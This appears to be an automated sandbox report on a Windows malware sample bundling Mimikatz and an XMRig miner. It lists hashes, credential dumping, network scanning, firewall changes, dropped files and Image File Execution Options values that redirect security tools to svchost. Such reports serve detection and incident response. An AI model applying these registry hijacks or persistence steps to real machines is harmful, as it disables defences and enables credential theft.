Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
24-10-2024 06:54
Behavioral task
behavioral1
Sample
2024-10-24_89419f01e8cd90c37aad24df81044ebf_hacktools_icedid_mimikatz.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2024-10-24_89419f01e8cd90c37aad24df81044ebf_hacktools_icedid_mimikatz.exe
Resource
win10v2004-20241007-en
General
-
Target
2024-10-24_89419f01e8cd90c37aad24df81044ebf_hacktools_icedid_mimikatz.exe
-
Size
9.4MB
-
MD5
89419f01e8cd90c37aad24df81044ebf
-
SHA1
e5ab2fea34af1a3100de7ed68555e00920d5f4ee
-
SHA256
2abdb7720777601e696a03929a29c72c2a5b7a0caeb2334933013e01175261c8
-
SHA512
4d9ad9830c7f7dc1502aa70ff831f8364299a9a68456d4a7022925f43200447986a141205dd2845a478c65cc2ad2799eb9fb506522c2dee0bef4ad0c53400711
-
SSDEEP
196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
wlifiji.exedescription pid Process procid_target PID 3616 created 2128 3616 wlifiji.exe 38 -
Contacts a large (28851) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 12 IoCs
Processes:
resource yara_rule behavioral2/memory/1684-182-0x00007FF60D4B0000-0x00007FF60D5D0000-memory.dmp xmrig behavioral2/memory/1684-186-0x00007FF60D4B0000-0x00007FF60D5D0000-memory.dmp xmrig behavioral2/memory/1684-203-0x00007FF60D4B0000-0x00007FF60D5D0000-memory.dmp xmrig behavioral2/memory/1684-216-0x00007FF60D4B0000-0x00007FF60D5D0000-memory.dmp xmrig behavioral2/memory/1684-225-0x00007FF60D4B0000-0x00007FF60D5D0000-memory.dmp xmrig behavioral2/memory/1684-234-0x00007FF60D4B0000-0x00007FF60D5D0000-memory.dmp xmrig behavioral2/memory/1684-247-0x00007FF60D4B0000-0x00007FF60D5D0000-memory.dmp xmrig behavioral2/memory/1684-257-0x00007FF60D4B0000-0x00007FF60D5D0000-memory.dmp xmrig behavioral2/memory/1684-265-0x00007FF60D4B0000-0x00007FF60D5D0000-memory.dmp xmrig behavioral2/memory/1684-362-0x00007FF60D4B0000-0x00007FF60D5D0000-memory.dmp xmrig behavioral2/memory/1684-363-0x00007FF60D4B0000-0x00007FF60D5D0000-memory.dmp xmrig behavioral2/memory/1684-365-0x00007FF60D4B0000-0x00007FF60D5D0000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
Processes:
resource yara_rule behavioral2/memory/1492-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/1492-4-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/files/0x0007000000023cb5-6.dat mimikatz behavioral2/memory/3564-8-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/4260-138-0x00007FF722C80000-0x00007FF722D6E000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
Processes:
wpcap.exewlifiji.exedescription ioc Process File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts wlifiji.exe File opened for modification C:\Windows\system32\drivers\etc\hosts wlifiji.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
Processes:
wlifiji.exedescription ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" wlifiji.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" wlifiji.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe wlifiji.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" wlifiji.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe wlifiji.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe wlifiji.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe wlifiji.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe wlifiji.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" wlifiji.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" wlifiji.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" wlifiji.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe wlifiji.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" wlifiji.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe wlifiji.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe wlifiji.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe wlifiji.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" wlifiji.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe wlifiji.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" wlifiji.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" wlifiji.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe wlifiji.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" wlifiji.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe wlifiji.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" wlifiji.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe wlifiji.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" wlifiji.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" wlifiji.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe wlifiji.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" wlifiji.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe wlifiji.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe wlifiji.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" wlifiji.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe wlifiji.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" wlifiji.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" wlifiji.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe wlifiji.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe wlifiji.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe wlifiji.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" wlifiji.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" wlifiji.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
Processes:
netsh.exenetsh.exepid Process 1184 netsh.exe 1448 netsh.exe -
Executes dropped EXE 29 IoCs
Processes:
wlifiji.exewlifiji.exewpcap.exeregnzlibv.exevfshost.exexohudmc.exebteqliisl.exeumueiy.exenfquyl.exebteqliisl.exewlifiji.exebteqliisl.exebteqliisl.exebteqliisl.exebteqliisl.exebteqliisl.exebteqliisl.exebteqliisl.exebteqliisl.exebteqliisl.exebteqliisl.exebteqliisl.exebteqliisl.exebteqliisl.exebteqliisl.exebteqliisl.exebteqliisl.exekbebvutsd.exewlifiji.exepid Process 3564 wlifiji.exe 3616 wlifiji.exe 3400 wpcap.exe 5072 regnzlibv.exe 4260 vfshost.exe 3556 xohudmc.exe 2964 bteqliisl.exe 1752 umueiy.exe 1684 nfquyl.exe 4200 bteqliisl.exe 3280 wlifiji.exe 2940 bteqliisl.exe 3064 bteqliisl.exe 5060 bteqliisl.exe 2564 bteqliisl.exe 740 bteqliisl.exe 2068 bteqliisl.exe 2452 bteqliisl.exe 4536 bteqliisl.exe 3748 bteqliisl.exe 5064 bteqliisl.exe 2940 bteqliisl.exe 5000 bteqliisl.exe 1276 bteqliisl.exe 920 bteqliisl.exe 604 bteqliisl.exe 3404 bteqliisl.exe 4092 kbebvutsd.exe 6032 wlifiji.exe -
Loads dropped DLL 12 IoCs
Processes:
wpcap.exeregnzlibv.exepid Process 3400 wpcap.exe 3400 wpcap.exe 3400 wpcap.exe 3400 wpcap.exe 3400 wpcap.exe 3400 wpcap.exe 3400 wpcap.exe 3400 wpcap.exe 3400 wpcap.exe 5072 regnzlibv.exe 5072 regnzlibv.exe 5072 regnzlibv.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 81 ifconfig.me 84 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
Processes:
wlifiji.exewpcap.exexohudmc.exedescription ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 wlifiji.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\umueiy.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies wlifiji.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache wlifiji.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content wlifiji.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft wlifiji.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE wlifiji.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData wlifiji.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 wlifiji.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BB4F4B8E2B2CFC476849B6B724C153FF wlifiji.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BB4F4B8E2B2CFC476849B6B724C153FF wlifiji.exe File created C:\Windows\system32\Packet.dll wpcap.exe File created C:\Windows\SysWOW64\umueiy.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 wlifiji.exe -
Processes:
resource yara_rule behavioral2/files/0x0007000000023d03-134.dat upx behavioral2/memory/4260-135-0x00007FF722C80000-0x00007FF722D6E000-memory.dmp upx behavioral2/memory/4260-138-0x00007FF722C80000-0x00007FF722D6E000-memory.dmp upx behavioral2/memory/2964-146-0x00007FF7B9160000-0x00007FF7B91BB000-memory.dmp upx behavioral2/files/0x0007000000023d0e-145.dat upx behavioral2/memory/2964-160-0x00007FF7B9160000-0x00007FF7B91BB000-memory.dmp upx behavioral2/files/0x0007000000023d0b-163.dat upx behavioral2/memory/1684-165-0x00007FF60D4B0000-0x00007FF60D5D0000-memory.dmp upx behavioral2/memory/4200-171-0x00007FF7B9160000-0x00007FF7B91BB000-memory.dmp upx behavioral2/memory/2940-179-0x00007FF7B9160000-0x00007FF7B91BB000-memory.dmp upx behavioral2/memory/1684-182-0x00007FF60D4B0000-0x00007FF60D5D0000-memory.dmp upx behavioral2/memory/3064-184-0x00007FF7B9160000-0x00007FF7B91BB000-memory.dmp upx behavioral2/memory/1684-186-0x00007FF60D4B0000-0x00007FF60D5D0000-memory.dmp upx behavioral2/memory/5060-189-0x00007FF7B9160000-0x00007FF7B91BB000-memory.dmp upx behavioral2/memory/2564-193-0x00007FF7B9160000-0x00007FF7B91BB000-memory.dmp upx behavioral2/memory/740-197-0x00007FF7B9160000-0x00007FF7B91BB000-memory.dmp upx behavioral2/memory/2068-201-0x00007FF7B9160000-0x00007FF7B91BB000-memory.dmp upx behavioral2/memory/1684-203-0x00007FF60D4B0000-0x00007FF60D5D0000-memory.dmp upx behavioral2/memory/2452-206-0x00007FF7B9160000-0x00007FF7B91BB000-memory.dmp upx behavioral2/memory/4536-210-0x00007FF7B9160000-0x00007FF7B91BB000-memory.dmp upx behavioral2/memory/3748-214-0x00007FF7B9160000-0x00007FF7B91BB000-memory.dmp upx behavioral2/memory/1684-216-0x00007FF60D4B0000-0x00007FF60D5D0000-memory.dmp upx behavioral2/memory/5064-219-0x00007FF7B9160000-0x00007FF7B91BB000-memory.dmp upx behavioral2/memory/2940-223-0x00007FF7B9160000-0x00007FF7B91BB000-memory.dmp upx behavioral2/memory/1684-225-0x00007FF60D4B0000-0x00007FF60D5D0000-memory.dmp upx behavioral2/memory/5000-228-0x00007FF7B9160000-0x00007FF7B91BB000-memory.dmp upx behavioral2/memory/1276-231-0x00007FF7B9160000-0x00007FF7B91BB000-memory.dmp upx behavioral2/memory/920-233-0x00007FF7B9160000-0x00007FF7B91BB000-memory.dmp upx behavioral2/memory/1684-234-0x00007FF60D4B0000-0x00007FF60D5D0000-memory.dmp upx behavioral2/memory/604-236-0x00007FF7B9160000-0x00007FF7B91BB000-memory.dmp upx behavioral2/memory/3404-238-0x00007FF7B9160000-0x00007FF7B91BB000-memory.dmp upx behavioral2/memory/1684-247-0x00007FF60D4B0000-0x00007FF60D5D0000-memory.dmp upx behavioral2/memory/1684-257-0x00007FF60D4B0000-0x00007FF60D5D0000-memory.dmp upx behavioral2/memory/1684-265-0x00007FF60D4B0000-0x00007FF60D5D0000-memory.dmp upx behavioral2/memory/1684-362-0x00007FF60D4B0000-0x00007FF60D5D0000-memory.dmp upx behavioral2/memory/1684-363-0x00007FF60D4B0000-0x00007FF60D5D0000-memory.dmp upx behavioral2/memory/1684-365-0x00007FF60D4B0000-0x00007FF60D5D0000-memory.dmp upx -
Drops file in Program Files directory 3 IoCs
Processes:
wpcap.exedescription ioc Process File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
Processes:
2024-10-24_89419f01e8cd90c37aad24df81044ebf_hacktools_icedid_mimikatz.exewlifiji.exekbebvutsd.execmd.exedescription ioc Process File created C:\Windows\yqqdgivv\wlifiji.exe 2024-10-24_89419f01e8cd90c37aad24df81044ebf_hacktools_icedid_mimikatz.exe File created C:\Windows\ysudwuiub\tluvwvuph\regnzlibv.exe wlifiji.exe File created C:\Windows\ysudwuiub\UnattendGC\specials\exma-1.dll wlifiji.exe File created C:\Windows\ysudwuiub\UnattendGC\svschost.xml wlifiji.exe File created C:\Windows\ysudwuiub\UnattendGC\specials\schoedcl.xml wlifiji.exe File created C:\Windows\ysudwuiub\UnattendGC\specials\spoolsrv.xml wlifiji.exe File created C:\Windows\yqqdgivv\spoolsrv.xml wlifiji.exe File created C:\Windows\ysudwuiub\UnattendGC\Shellcode.ini wlifiji.exe File created C:\Windows\ysudwuiub\upbdrjv\swrpwe.exe wlifiji.exe File opened for modification C:\Windows\ysudwuiub\tluvwvuph\Packet.dll wlifiji.exe File created C:\Windows\ysudwuiub\UnattendGC\specials\cnli-1.dll wlifiji.exe File created C:\Windows\ysudwuiub\UnattendGC\specials\posh-0.dll wlifiji.exe File created C:\Windows\ysudwuiub\UnattendGC\specials\tucl-1.dll wlifiji.exe File created C:\Windows\yqqdgivv\docmicfg.xml wlifiji.exe File opened for modification C:\Windows\ysudwuiub\tluvwvuph\Result.txt kbebvutsd.exe File created C:\Windows\ysudwuiub\tluvwvuph\wpcap.exe wlifiji.exe File created C:\Windows\ysudwuiub\tluvwvuph\kbebvutsd.exe wlifiji.exe File created C:\Windows\ysudwuiub\UnattendGC\specials\ssleay32.dll wlifiji.exe File opened for modification C:\Windows\yqqdgivv\vimpcsvc.xml wlifiji.exe File created C:\Windows\ysudwuiub\Corporate\vfshost.exe wlifiji.exe File opened for modification C:\Windows\yqqdgivv\wlifiji.exe 2024-10-24_89419f01e8cd90c37aad24df81044ebf_hacktools_icedid_mimikatz.exe File created C:\Windows\ysudwuiub\UnattendGC\specials\schoedcl.exe wlifiji.exe File created C:\Windows\ysudwuiub\UnattendGC\specials\svschost.xml wlifiji.exe File created C:\Windows\ysudwuiub\UnattendGC\specials\vimpcsvc.xml wlifiji.exe File created C:\Windows\yqqdgivv\vimpcsvc.xml wlifiji.exe File created C:\Windows\ysudwuiub\UnattendGC\specials\libxml2.dll wlifiji.exe File created C:\Windows\ysudwuiub\UnattendGC\specials\vimpcsvc.exe wlifiji.exe File opened for modification C:\Windows\yqqdgivv\docmicfg.xml wlifiji.exe File opened for modification C:\Windows\ysudwuiub\Corporate\log.txt cmd.exe File created C:\Windows\ysudwuiub\UnattendGC\specials\crli-0.dll wlifiji.exe File created C:\Windows\ysudwuiub\UnattendGC\specials\ucl.dll wlifiji.exe File created C:\Windows\ime\wlifiji.exe wlifiji.exe File created C:\Windows\ysudwuiub\UnattendGC\specials\spoolsrv.exe wlifiji.exe File created C:\Windows\ysudwuiub\UnattendGC\docmicfg.xml wlifiji.exe File opened for modification C:\Windows\yqqdgivv\schoedcl.xml wlifiji.exe File created C:\Windows\ysudwuiub\UnattendGC\specials\coli-0.dll wlifiji.exe File created C:\Windows\ysudwuiub\UnattendGC\vimpcsvc.xml wlifiji.exe File created C:\Windows\yqqdgivv\schoedcl.xml wlifiji.exe File created C:\Windows\ysudwuiub\UnattendGC\AppCapture32.dll wlifiji.exe File created C:\Windows\ysudwuiub\Corporate\mimilib.dll wlifiji.exe File created C:\Windows\ysudwuiub\UnattendGC\specials\docmicfg.xml wlifiji.exe File created C:\Windows\ysudwuiub\tluvwvuph\wpcap.dll wlifiji.exe File created C:\Windows\ysudwuiub\UnattendGC\specials\xdvl-0.dll wlifiji.exe File created C:\Windows\ysudwuiub\UnattendGC\spoolsrv.xml wlifiji.exe File created C:\Windows\ysudwuiub\UnattendGC\AppCapture64.dll wlifiji.exe File created C:\Windows\ysudwuiub\tluvwvuph\ip.txt wlifiji.exe File created C:\Windows\ysudwuiub\UnattendGC\specials\svschost.exe wlifiji.exe File created C:\Windows\ysudwuiub\UnattendGC\schoedcl.xml wlifiji.exe File opened for modification C:\Windows\yqqdgivv\svschost.xml wlifiji.exe File created C:\Windows\ysudwuiub\Corporate\mimidrv.sys wlifiji.exe File created C:\Windows\ysudwuiub\UnattendGC\specials\libeay32.dll wlifiji.exe File created C:\Windows\ysudwuiub\UnattendGC\specials\trch-1.dll wlifiji.exe File opened for modification C:\Windows\yqqdgivv\spoolsrv.xml wlifiji.exe File created C:\Windows\ysudwuiub\tluvwvuph\scan.bat wlifiji.exe File created C:\Windows\ysudwuiub\tluvwvuph\Packet.dll wlifiji.exe File created C:\Windows\ysudwuiub\UnattendGC\specials\tibe-2.dll wlifiji.exe File created C:\Windows\ysudwuiub\UnattendGC\specials\trfo-2.dll wlifiji.exe File created C:\Windows\ysudwuiub\UnattendGC\specials\zlib1.dll wlifiji.exe File created C:\Windows\yqqdgivv\svschost.xml wlifiji.exe File created C:\Windows\ysudwuiub\UnattendGC\specials\docmicfg.exe wlifiji.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exepid Process 4172 sc.exe 32 sc.exe 1900 sc.exe 2228 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exedescription ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
